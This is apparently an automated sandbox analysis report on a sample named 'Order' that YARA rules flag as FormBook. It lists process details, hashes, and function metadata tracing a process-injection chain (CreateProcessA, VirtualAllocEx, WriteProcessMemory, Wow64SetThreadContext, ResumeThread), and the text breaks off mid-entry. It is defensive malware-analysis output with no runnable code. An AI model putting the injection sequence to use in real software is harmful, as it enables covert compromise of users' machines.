                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3126216814.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                              Reputation:high
                                                              Has exited:false

                                                              General

                                                              Target ID:12
                                                              Start time:11:28:12
                                                              Start date:12/11/2024
                                                              Path:C:\Windows\SysWOW64\fc.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\SysWOW64\fc.exe"
                                                              Imagebase:0x510000
                                                              File size:22'528 bytes
                                                              MD5 hash:4D5F86B337D0D099E18B14F1428AAEFF
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3127049322.0000000003750000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3127133460.00000000037A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:moderate
                                                              Has exited:false

                                                              General

                                                              Target ID:16
                                                              Start time:11:28:43
                                                              Start date:12/11/2024
                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                              Imagebase:0x7ff722870000
                                                              File size:676'768 bytes
                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Disassembly

                                                              Reset < >

                                                                Execution Graph

                                                                Execution Coverage:7.6%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:69
                                                                Total number of Limit Nodes:10
                                                                execution_graph 27765 6d0d670 27766 6d0d6b0 VirtualAllocEx 27765->27766 27768 6d0d6ed 27766->27768 27769 6d0d730 27770 6d0d778 WriteProcessMemory 27769->27770 27772 6d0d7cf 27770->27772 27773 6d0fa30 27774 6d0fbbb 27773->27774 27775 6d0fa56 27773->27775 27775->27774 27777 6d0bdf0 27775->27777 27778 6d0fcb0 PostMessageW 27777->27778 27779 6d0fd1c 27778->27779 27779->27775 27788 6d0d820 27789 6d0d86b ReadProcessMemory 27788->27789 27791 6d0d8af 27789->27791 27734 eb4668 27735 eb467a 27734->27735 27736 eb4686 27735->27736 27738 eb4778 27735->27738 27739 eb479d 27738->27739 27744 eb4888 27739->27744 27748 eb4887 27739->27748 27752 eb4878 27739->27752 27746 eb48af 27744->27746 27745 eb498c 27745->27745 27746->27745 27757 eb44e0 27746->27757 27750 eb48af 27748->27750 27749 eb498c 27749->27749 27750->27749 27751 eb44e0 CreateActCtxA 27750->27751 27751->27749 27753 eb47a7 27752->27753 27755 eb48da 27752->27755 27753->27736 27754 eb498c 27754->27754 27755->27754 27756 eb44e0 CreateActCtxA 27755->27756 27756->27754 27758 eb5918 CreateActCtxA 27757->27758 27760 eb59db 27758->27760 27760->27760 27792 ebd458 27793 ebd49e GetCurrentProcess 27792->27793 27795 ebd4e9 27793->27795 27796 ebd4f0 GetCurrentThread 27793->27796 27795->27796 27797 ebd52d GetCurrentProcess 27796->27797 27798 ebd526 27796->27798 27799 ebd563 27797->27799 27798->27797 27800 ebd58b GetCurrentThreadId 27799->27800 27801 ebd5bc 27800->27801 27780 6d0d9b8 27781 6d0da41 CreateProcessA 27780->27781 27783 6d0dc03 27781->27783 27783->27783 27784 6d0cc78 27785 6d0ccb8 ResumeThread 27784->27785 27787 6d0cce9 27785->27787 27802 6d0cd28 27803 6d0cd6d Wow64SetThreadContext 27802->27803 27805 6d0cdb5 27803->27805 27763 7091410 CloseHandle 27764 709146a 27763->27764 27761 ebd6a0 DuplicateHandle 27762 ebd736 27761->27762 27806 ebacd0 27810 ebadb9 27806->27810 27815 ebadc8 27806->27815 27807 ebacdf 27811 ebadfc 27810->27811 27812 ebadd9 27810->27812 27811->27807 27812->27811 27813 ebb000 GetModuleHandleW 27812->27813 27814 ebb02d 27813->27814 27814->27807 27816 ebadd9 27815->27816 27817 ebadfc 27815->27817 27816->27817 27818 ebb000 GetModuleHandleW 27816->27818 27817->27807 27819 ebb02d 27818->27819 27819->27807

                                                                Executed Functions

                                                                Function 07090940 Relevance: .6, Instructions: 604COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1424285196.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7090000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 78cc55b2ef8da634f5fc29ee08e53dc3de3f562f91da80b0f5cc269e79e12efc
                                                                • Instruction ID: 3b3bd80b1f6118f4e070e1b320340744eb9c4032ec9daee97e20c319c6d865d7
                                                                • Opcode Fuzzy Hash: 78cc55b2ef8da634f5fc29ee08e53dc3de3f562f91da80b0f5cc269e79e12efc
                                                                • Instruction Fuzzy Hash: 6522BBB1B012069FDB68DB65C450BAEB7F6AF89700F2445B9E146EB3A1CB31ED01CB51
                                                                Function 00EBD448 Relevance: 6.1, APIs: 4, Instructions: 129threadCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 297 ebd448-ebd4e7 GetCurrentProcess 301 ebd4e9-ebd4ef 297->301 302 ebd4f0-ebd524 GetCurrentThread 297->302 301->302 303 ebd52d-ebd561 GetCurrentProcess 302->303 304 ebd526-ebd52c 302->304 306 ebd56a-ebd585 call ebd629 303->306 307 ebd563-ebd569 303->307 304->303 310 ebd58b-ebd5ba GetCurrentThreadId 306->310 307->306 311 ebd5bc-ebd5c2 310->311 312 ebd5c3-ebd625 310->312 311->312
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32 ref: 00EBD4D6
                                                                • GetCurrentThread.KERNEL32 ref: 00EBD513
                                                                • GetCurrentProcess.KERNEL32 ref: 00EBD550
                                                                • GetCurrentThreadId.KERNEL32 ref: 00EBD5A9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1408994058.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_eb0000_Order.jbxd
                                                                Similarity
                                                                • API ID: Current$ProcessThread
                                                                • String ID:
                                                                • API String ID: 2063062207-0
                                                                • Opcode ID: 5e1e75a9da7d0912528b1d8098ab3e8732b75c7f6ec30804d7a2557a16c1c1d6
                                                                • Instruction ID: 4155cb85fa631e799fe6317e1d21527792f4bd997a1470d769b4e0ac8851f0a7
                                                                • Opcode Fuzzy Hash: 5e1e75a9da7d0912528b1d8098ab3e8732b75c7f6ec30804d7a2557a16c1c1d6
                                                                • Instruction Fuzzy Hash: 63516AB49017098FDB14DFA9D9497DEBBF2EF88304F208059E419A7290D778A944CF66
                                                                Function 00EBD458 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 319 ebd458-ebd4e7 GetCurrentProcess 323 ebd4e9-ebd4ef 319->323 324 ebd4f0-ebd524 GetCurrentThread 319->324 323->324 325 ebd52d-ebd561 GetCurrentProcess 324->325 326 ebd526-ebd52c 324->326 328 ebd56a-ebd585 call ebd629 325->328 329 ebd563-ebd569 325->329 326->325 332 ebd58b-ebd5ba GetCurrentThreadId 328->332 329->328 333 ebd5bc-ebd5c2 332->333 334 ebd5c3-ebd625 332->334 333->334
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32 ref: 00EBD4D6
                                                                • GetCurrentThread.KERNEL32 ref: 00EBD513
                                                                • GetCurrentProcess.KERNEL32 ref: 00EBD550
                                                                • GetCurrentThreadId.KERNEL32 ref: 00EBD5A9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1408994058.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_eb0000_Order.jbxd
                                                                Similarity
                                                                • API ID: Current$ProcessThread
                                                                • String ID:
                                                                • API String ID: 2063062207-0
                                                                • Opcode ID: d452b2459d572e908018316b5500190734acea33ed7e935c795f3704697c97e1
                                                                • Instruction ID: c80307b97d31c32fc36f93f9e9e639e0bd1384e2ab0e8581da9f7e2aeb120842
                                                                • Opcode Fuzzy Hash: d452b2459d572e908018316b5500190734acea33ed7e935c795f3704697c97e1
                                                                • Instruction Fuzzy Hash: FB5158B49013098FDB14DFA9D949BDEBBF1EF88314F208059E419A7250D778A944CF66
                                                                Function 06D0D9AC Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 366 6d0d9ac-6d0da4d 368 6d0da86-6d0daa6 366->368 369 6d0da4f-6d0da59 366->369 374 6d0daa8-6d0dab2 368->374 375 6d0dadf-6d0db0e 368->375 369->368 370 6d0da5b-6d0da5d 369->370 372 6d0da80-6d0da83 370->372 373 6d0da5f-6d0da69 370->373 372->368 376 6d0da6b 373->376 377 6d0da6d-6d0da7c 373->377 374->375 378 6d0dab4-6d0dab6 374->378 385 6d0db10-6d0db1a 375->385 386 6d0db47-6d0dc01 CreateProcessA 375->386 376->377 377->377 379 6d0da7e 377->379 380 6d0dab8-6d0dac2 378->380 381 6d0dad9-6d0dadc 378->381 379->372 383 6d0dac4 380->383 384 6d0dac6-6d0dad5 380->384 381->375 383->384 384->384 387 6d0dad7 384->387 385->386 388 6d0db1c-6d0db1e 385->388 397 6d0dc03-6d0dc09 386->397 398 6d0dc0a-6d0dc90 386->398 387->381 389 6d0db20-6d0db2a 388->389 390 6d0db41-6d0db44 388->390 392 6d0db2c 389->392 393 6d0db2e-6d0db3d 389->393 390->386 392->393 393->393 394 6d0db3f 393->394 394->390 397->398 408 6d0dca0-6d0dca4 398->408 409 6d0dc92-6d0dc96 398->409 411 6d0dcb4-6d0dcb8 408->411 412 6d0dca6-6d0dcaa 408->412 409->408 410 6d0dc98 409->410 410->408 414 6d0dcc8-6d0dccc 411->414 415 6d0dcba-6d0dcbe 411->415 412->411 413 6d0dcac 412->413 413->411 417 6d0dcde-6d0dce5 414->417 418 6d0dcce-6d0dcd4 414->418 415->414 416 6d0dcc0 415->416 416->414 419 6d0dce7-6d0dcf6 417->419 420 6d0dcfc 417->420 418->417 419->420 422 6d0dcfd 420->422 422->422
                                                                APIs
                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D0DBEE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1423690424.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6d00000_Order.jbxd
                                                                Similarity
                                                                • API ID: CreateProcess
                                                                • String ID:
                                                                • API String ID: 963392458-0
                                                                • Opcode ID: 457232946340a32c387299065eaf16f42db186452d8876bac637ba49faa66321
                                                                • Instruction ID: 48e7f395ebc304639d1d61fe8025a0bbb25159026a38bc79168eafb88f5d2bf7
                                                                • Opcode Fuzzy Hash: 457232946340a32c387299065eaf16f42db186452d8876bac637ba49faa66321
                                                                • Instruction Fuzzy Hash: CEA15C71D003198FEB64DFA8C841BEDBBB2FF48314F14856AE859A7280DB749985CF91
                                                                Function 06D0D9B8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 423 6d0d9b8-6d0da4d 425 6d0da86-6d0daa6 423->425 426 6d0da4f-6d0da59 423->426 431 6d0daa8-6d0dab2 425->431 432 6d0dadf-6d0db0e 425->432 426->425 427 6d0da5b-6d0da5d 426->427 429 6d0da80-6d0da83 427->429 430 6d0da5f-6d0da69 427->430 429->425 433 6d0da6b 430->433 434 6d0da6d-6d0da7c 430->434 431->432 435 6d0dab4-6d0dab6 431->435 442 6d0db10-6d0db1a 432->442 443 6d0db47-6d0dc01 CreateProcessA 432->443 433->434 434->434 436 6d0da7e 434->436 437 6d0dab8-6d0dac2 435->437 438 6d0dad9-6d0dadc 435->438 436->429 440 6d0dac4 437->440 441 6d0dac6-6d0dad5 437->441 438->432 440->441 441->441 444 6d0dad7 441->444 442->443 445 6d0db1c-6d0db1e 442->445 454 6d0dc03-6d0dc09 443->454 455 6d0dc0a-6d0dc90 443->455 444->438 446 6d0db20-6d0db2a 445->446 447 6d0db41-6d0db44 445->447 449 6d0db2c 446->449 450 6d0db2e-6d0db3d 446->450 447->443 449->450 450->450 451 6d0db3f 450->451 451->447 454->455 465 6d0dca0-6d0dca4 455->465 466 6d0dc92-6d0dc96 455->466 468 6d0dcb4-6d0dcb8 465->468 469 6d0dca6-6d0dcaa 465->469 466->465 467 6d0dc98 466->467 467->465 471 6d0dcc8-6d0dccc 468->471 472 6d0dcba-6d0dcbe 468->472 469->468 470 6d0dcac 469->470 470->468 474 6d0dcde-6d0dce5 471->474 475 6d0dcce-6d0dcd4 471->475 472->471 473 6d0dcc0 472->473 473->471 476 6d0dce7-6d0dcf6 474->476 477 6d0dcfc 474->477 475->474 476->477 479 6d0dcfd 477->479 479->479
                                                                APIs
                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D0DBEE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1423690424.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6d00000_Order.jbxd
                                                                Similarity
                                                                • API ID: CreateProcess
                                                                • String ID:
                                                                • API String ID: 963392458-0
                                                                • Opcode ID: 9d5087cc7907801f1eefca7bac56ae56912ae7d38f80eaee74e806dd6cdf9fad
                                                                • Instruction ID: 6e6a3aa42d921c0e49411c0687297a5416db7ffcec7300faeade8934930fae49
                                                                • Opcode Fuzzy Hash: 9d5087cc7907801f1eefca7bac56ae56912ae7d38f80eaee74e806dd6cdf9fad
                                                                • Instruction Fuzzy Hash: 54915C71D003198FEB64DFA8C841BEDBBB2FF48310F14856AE819A7280DB749985CF91
                                                                Function 00EBADC8 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 480 ebadc8-ebadd7 481 ebadd9-ebade6 call eba120 480->481 482 ebae03-ebae07 480->482 489 ebade8 481->489 490 ebadfc 481->490 483 ebae1b-ebae5c 482->483 484 ebae09-ebae13 482->484 491 ebae69-ebae77 483->491 492 ebae5e-ebae66 483->492 484->483 535 ebadee call ebb05f 489->535 536 ebadee call ebb060 489->536 490->482 493 ebae9b-ebae9d 491->493 494 ebae79-ebae7e 491->494 492->491 497 ebaea0-ebaea7 493->497 498 ebae89 494->498 499 ebae80-ebae87 call eba12c 494->499 495 ebadf4-ebadf6 495->490 496 ebaf38-ebaff8 495->496 530 ebaffa-ebaffd 496->530 531 ebb000-ebb02b GetModuleHandleW 496->531 501 ebaea9-ebaeb1 497->501 502 ebaeb4-ebaebb 497->502 500 ebae8b-ebae99 498->500 499->500 500->497 501->502 504 ebaec8-ebaed1 call eba13c 502->504 505 ebaebd-ebaec5 502->505 511 ebaede-ebaee3 504->511 512 ebaed3-ebaedb 504->512 505->504 513 ebaf01-ebaf0e 511->513 514 ebaee5-ebaeec 511->514 512->511 520 ebaf31-ebaf37 513->520 521 ebaf10-ebaf2e 513->521 514->513 516 ebaeee-ebaefe call eba14c call eba15c 514->516 516->513 521->520 530->531 532 ebb02d-ebb033 531->532 533 ebb034-ebb048 531->533 532->533 535->495 536->495
                                                                APIs
                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00EBB01E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1408994058.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_eb0000_Order.jbxd
                                                                Similarity
                                                                • API ID: HandleModule
                                                                • String ID:
                                                                • API String ID: 4139908857-0
                                                                • Opcode ID: 7fdc83313d41481f7626bed8a6582c1c94c3fdfdfd691e78f484a86c8579eccc
                                                                • Instruction ID: c73906bc6161efbf315fa9d276945ee4fe2c320b67099a55dde04b2975de602f
                                                                • Opcode Fuzzy Hash: 7fdc83313d41481f7626bed8a6582c1c94c3fdfdfd691e78f484a86c8579eccc
                                                                • Instruction Fuzzy Hash: D7712470A00B058FDB24DF29D45579BBBF1BF88304F14892DE48AE7A50D775E845CB91
                                                                Function 00EB590D Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 645 eb590d-eb59d9 CreateActCtxA 647 eb59db-eb59e1 645->647 648 eb59e2-eb5a3c 645->648 647->648 655 eb5a4b-eb5a4f 648->655 656 eb5a3e-eb5a41 648->656 657 eb5a51-eb5a5d 655->657 658 eb5a60 655->658 656->655 657->658 660 eb5a61 658->660 660->660
                                                                APIs
                                                                • CreateActCtxA.KERNEL32(?), ref: 00EB59C9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1408994058.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_eb0000_Order.jbxd
                                                                Similarity
                                                                • API ID: Create
                                                                • String ID:
                                                                • API String ID: 2289755597-0
                                                                • Opcode ID: 3ff38cdcfb1bdc891ccfc9dcb1b76ee466582d928b671b02a4d6f56d04ca24b4
                                                                • Instruction ID: 834ac3189fe32bc52dcf899a0a13b6f68a89dbfe87c27251d7fb6a80e5749785
                                                                • Opcode Fuzzy Hash: 3ff38cdcfb1bdc891ccfc9dcb1b76ee466582d928b671b02a4d6f56d04ca24b4
                                                                • Instruction Fuzzy Hash: 4B41D272C0071ACBDB24DFA9C8857CEBBB1BF49304F20816AD508BB251DB756946CF50
                                                                Function 00EB44E0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 661 eb44e0-eb59d9 CreateActCtxA 664 eb59db-eb59e1 661->664 665 eb59e2-eb5a3c 661->665 664->665 672 eb5a4b-eb5a4f 665->672 673 eb5a3e-eb5a41 665->673 674 eb5a51-eb5a5d 672->674 675 eb5a60 672->675 673->672 674->675 677 eb5a61 675->677 677->677
                                                                APIs
                                                                • CreateActCtxA.KERNEL32(?), ref: 00EB59C9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1408994058.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_eb0000_Order.jbxd
                                                                Similarity
                                                                • API ID: Create
                                                                • String ID:
                                                                • API String ID: 2289755597-0
                                                                • Opcode ID: 76c18a72e71d918e45d6419ed3449ad2b4e979169b15c550d03f60d6136a2a36
                                                                • Instruction ID: 235baf7cabbc3f7594b32de2770dc81d455f901fce130400b4b46ad251d4115f
                                                                • Opcode Fuzzy Hash: 76c18a72e71d918e45d6419ed3449ad2b4e979169b15c550d03f60d6136a2a36
                                                                • Instruction Fuzzy Hash: 7C41E1B1C00719CBEB24DFA9C8447CEBBB1BF49304F20816AD508BB251DB756946CF90
                                                                Function 06D0D728 Relevance: 1.6, APIs: 1, Instructions: 74injectionCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 738 6d0d728-6d0d77e 741 6d0d780-6d0d78c 738->741 742 6d0d78e-6d0d7cd WriteProcessMemory 738->742 741->742 744 6d0d7d6-6d0d806 742->744 745 6d0d7cf-6d0d7d5 742->745 745->744
                                                                APIs
                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D0D7C0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1423690424.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6d00000_Order.jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessWrite
                                                                • String ID:
                                                                • API String ID: 3559483778-0
                                                                • Opcode ID: 7afff1bccf8f0ea89729331d3b16f76fa80009b41d946d0d4fe6e25a1badf446
                                                                • Instruction ID: b25d46e743a2583ebfdb8688f1453dbb507a14f929d78108b440576f9793c19e
                                                                • Opcode Fuzzy Hash: 7afff1bccf8f0ea89729331d3b16f76fa80009b41d946d0d4fe6e25a1badf446
                                                                • Instruction Fuzzy Hash: 1B213575D003099FDB10CFAAC885BDEBBF5FF48310F10842AE959A7241DB799944CBA4
                                                                Function 06D0D730 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 749 6d0d730-6d0d77e 751 6d0d780-6d0d78c 749->751 752 6d0d78e-6d0d7cd WriteProcessMemory 749->752 751->752 754 6d0d7d6-6d0d806 752->754 755 6d0d7cf-6d0d7d5 752->755 755->754
                                                                APIs
                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D0D7C0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1423690424.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6d00000_Order.jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessWrite
                                                                • String ID:
                                                                • API String ID: 3559483778-0
                                                                • Opcode ID: 5cfecfa9749a589e2ef91f771ea13758572b94ff6d0930af6b8f9bc60e040d18
                                                                • Instruction ID: c28b070d2d7637cb037d5f16273d84ce5a68a0a49d6122d16d091521ee7291c1
                                                                • Opcode Fuzzy Hash: 5cfecfa9749a589e2ef91f771ea13758572b94ff6d0930af6b8f9bc60e040d18
                                                                • Instruction Fuzzy Hash: 4E213675D003099FDB10DFAAC881BDEBBF5FF48310F50842AE919A7280D7799944CBA4
                                                                Function 06D0CD20 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 759 6d0cd20-6d0cd73 762 6d0cd83-6d0cd86 759->762 763 6d0cd75-6d0cd81 759->763 764 6d0cd8d-6d0cdb3 Wow64SetThreadContext 762->764 763->762 765 6d0cdb5-6d0cdbb 764->765 766 6d0cdbc-6d0cdec 764->766 765->766
                                                                APIs
                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D0CDA6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1423690424.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6d00000_Order.jbxd
                                                                Similarity
                                                                • API ID: ContextThreadWow64
                                                                • String ID:
                                                                • API String ID: 983334009-0
                                                                • Opcode ID: 6a72b3dbcba82d9b4ccbaeef14fd5aea393e958e5f98f8e5095bd8646978e2a6
                                                                • Instruction ID: e6eb0bd755294aaceeca7fef9dd4ca43d6b73cdd253461a55d4dc98d239f0420
                                                                • Opcode Fuzzy Hash: 6a72b3dbcba82d9b4ccbaeef14fd5aea393e958e5f98f8e5095bd8646978e2a6
                                                                • Instruction Fuzzy Hash: A7212875D103098FDB20DFAAC8857EEBBF4EF88320F548429D559A7280DB789945CFA4
                                                                Function 06D0D818 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 770 6d0d818-6d0d8ad ReadProcessMemory 775 6d0d8b6-6d0d8e6 770->775 776 6d0d8af-6d0d8b5 770->776 776->775
                                                                APIs
                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06D0D8A0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1423690424.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6d00000_Order.jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessRead
                                                                • String ID:
                                                                • API String ID: 1726664587-0
                                                                • Opcode ID: 1de7f1352aee778978680da3d2fca2521fc93188ef53bc41e819991b28a1e65e
                                                                • Instruction ID: 3d1f75146f2a173c121dae21f0b07c27de506f143901e17c2577a90da470cda0
                                                                • Opcode Fuzzy Hash: 1de7f1352aee778978680da3d2fca2521fc93188ef53bc41e819991b28a1e65e
                                                                • Instruction Fuzzy Hash: 55211671C013599FDB10DFAAC841BEEBBF5FF48310F50842AE919A7240DB399945CBA4
                                                                Function 00EBD698 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00EBD727
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1408994058.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_eb0000_Order.jbxd
                                                                Similarity
                                                                • API ID: DuplicateHandle
                                                                • String ID:
                                                                • API String ID: 3793708945-0
                                                                • Opcode ID: cefb31e462f2a27f476ee69a2e40e2fed4d6b49085e9779a9e497dbb5be48a63
                                                                • Instruction ID: 79f5e09bacef358d67dacdf23c21fcb183a4ee352b8af5daaf246d72998c4cb0
                                                                • Opcode Fuzzy Hash: cefb31e462f2a27f476ee69a2e40e2fed4d6b49085e9779a9e497dbb5be48a63
                                                                • Instruction Fuzzy Hash: 732135B5C0034ADFDB11CFA9D980BDEBBF5AB49320F14811AE958E7250D378A951CF64
                                                                Function 06D0CD28 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D0CDA6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1423690424.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6d00000_Order.jbxd
                                                                Similarity
                                                                • API ID: ContextThreadWow64
                                                                • String ID:
                                                                • API String ID: 983334009-0
                                                                • Opcode ID: 5d06098551f3cf0ad79910306c5a5711a0044df0448019ecca9756588f88379a
                                                                • Instruction ID: 839a0b2e9d9d7d30e5e25501acf62d748260930d50b24638540d5222178d9881
                                                                • Opcode Fuzzy Hash: 5d06098551f3cf0ad79910306c5a5711a0044df0448019ecca9756588f88379a
                                                                • Instruction Fuzzy Hash: 9F210771D103098FDB10DFAAC4857EEBBF5EF88320F54842AD959A7280DB789945CFA4
                                                                Function 06D0D820 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06D0D8A0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1423690424.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6d00000_Order.jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessRead
                                                                • String ID:
                                                                • API String ID: 1726664587-0
                                                                • Opcode ID: 9489e9fcda921a18dc30b286683abe2be2e73583bc0b2cd6d58e2701406da1f9
                                                                • Instruction ID: dc2cc8bcb5c92566698076a3fb5b952d1d3fd668e774c953933ecd04c7d86d2d
                                                                • Opcode Fuzzy Hash: 9489e9fcda921a18dc30b286683abe2be2e73583bc0b2cd6d58e2701406da1f9
                                                                • Instruction Fuzzy Hash: F9212571C003499FDB10DFAAC881BEEBBF5FF48320F50842AE919A7240D7399901CBA4
                                                                Function 00EBD6A0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00EBD727
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1408994058.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_eb0000_Order.jbxd
                                                                Similarity
                                                                • API ID: DuplicateHandle
                                                                • String ID:
